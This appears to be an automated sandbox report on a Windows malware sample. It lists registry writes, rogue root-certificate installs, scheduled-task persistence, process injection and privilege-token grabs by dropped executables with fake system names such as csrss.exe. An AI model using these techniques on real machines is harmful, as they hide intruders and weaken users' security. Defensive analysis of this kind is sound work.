Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Program Files (x86)\Gparted\Build.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Program Files (x86)\Gparted\Build.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Program Files (x86)\Gparted\Build.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Program Files (x86)\Gparted\Build.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12536443c2c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12536443c2c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-D78U2.tmp\Tue129ba086d712.tmp N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127d1be88dd70f8.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127ff3b5477.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Gparted\Build.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2908 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe
PID 2908 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe
PID 2908 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe
PID 2908 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe
PID 2908 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe
PID 2908 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe
PID 2908 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe
PID 2692 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
